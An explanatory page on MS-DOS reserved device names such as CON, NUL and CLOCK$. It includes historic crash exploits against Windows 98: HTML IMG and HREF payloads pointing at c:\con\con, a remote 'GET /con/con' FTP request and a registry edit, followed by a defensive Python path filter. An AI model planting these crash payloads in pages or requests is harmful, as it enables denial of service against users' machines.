In MS-DOS, several special "device files" were available to aid in performing certain tasks, such as clearing the screen or deleting extraneous output from a program. In order to maintain backwards-compatibility, all versions of Windows up to and including Windows 7 will refuse to allow you to create a file with these "reserved" device file names. The following file names are reserved:
- CON
- PRN
- AUX
- NUL
- COM1
- COM2
- COM3
- COM4
- COM5
- COM6
- COM7
- COM8
- COM9
- LPT1
- LPT2
- LPT3
- LPT4
- LPT5
- LPT6
- LPT7
- LPT8
- LPT9
CON, incidentally, was a device file used to capture whatever was printed onscreen.
NUL, AUX, CON, COM1-4, LPT1-3, and PRN are reserved words used for DOS devices.
These are specified in IO.SYS and date back to the early MS-DOS days. Here is a brief list:
- CLOCK$ - System clock
- CON - Console; combination of keyboard and screen to handle input and output
- AUX or COM1 - First serial communication port
- COMn - Second, third, ... communication port
- LPT1 or PRN - First parallel port
- NUL - Dummy port, or the "null device", which we all know under Linux as /dev/null
- CONFIG$ - Unknown
Besides,
1. Embedding image tags in HTML pages, with an image path referring to [drive]:\con\con or [drive]:\nul\nul. This will crash Windows 98 when the HTML is viewed (tested on Microsoft Outlook and Eudora Pro 4.2; Netscape Messenger appears to be invulnerable to this exploit).
Example:
<HTML>
<BODY>
<A HREF="c:\con\con">crashing IE</A>
<!-- or nul\nul, clock$\clock$ -->
<!-- or aux\aux, config$\config$ -->
</BODY>
</HTML>
2. Using GET /con/con or GET /nul/nul under WarFTPd on the root directory will also crash the operating system. Other FTP daemons have not been tested. This makes the vulnerability remotely exploitable.
3. Modifying [HKEY_LOCAL_MACHINE\Software\CLASSES\exefile\shell\open] to the value:
c:\con\con "%1" %* or c:\nul\nul "%1" %* will crash the system.
4. Creating an HTML page with IMG tags or HREF tags referring to the local "nul" path or the "con" path will crash the system when viewing the HTML file.
Example:
<HTML>
<BODY>
<IMG SRC="c:\con\con">
<!-- or nul\nul, clock$\clock$ -->
<!-- or aux\aux, config$\config$ -->
</BODY>
</HTML>
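On the defensive side, a server or mail filter can reject any request path, link target or upload name containing one of the reserved device names before it reaches the file system. The check below is an added example, not code from the original post; the function names are hypothetical, and it assumes that a name followed by an extension or trailing space (such as nul.txt) still resolves to the device.

```python
import re

# Device names listed on this page; COM and LPT cover digits 1-9.
RESERVED = {"CON", "PRN", "AUX", "NUL", "CLOCK$", "CONFIG$"}
RESERVED |= {f"COM{n}" for n in range(1, 10)} | {f"LPT{n}" for n in range(1, 10)}


def device_name(component):
    """Return the reserved device a single path component maps to, else None."""
    # Assumption: only the part before the first dot matters and trailing
    # spaces are ignored, so "nul.txt" and "CON " still name the device.
    base = component.split(".", 1)[0].rstrip(" ").upper()
    return base if base in RESERVED else None


def find_device_components(path):
    """Return (component, device) pairs for each reserved name in a path."""
    # Split on both separators so "c:\con\con" and "/con/con" are handled alike.
    parts = [p for p in re.split(r"[\\/]+", path) if p]
    hits = []
    for part in parts:
        dev = device_name(part)
        if dev:
            hits.append((part, dev))
    return hits


def is_safe_path(path):
    """True when no component of the path is a reserved device name."""
    return not find_device_components(path)


# Constructed sample inputs modelled on the paths quoted in the post.
SAMPLES = [
    "c:\\con\\con",
    "/nul/nul",
    "c:\\clock$\\clock$",
    "/pub/aux.tar.gz",
    "/pub/console.log",
    "/pub/readme.txt",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        verdict = "ALLOW" if is_safe_path(sample) else "REJECT"
        print(f"{verdict:6} {sample!r} {find_device_components(sample)}")
```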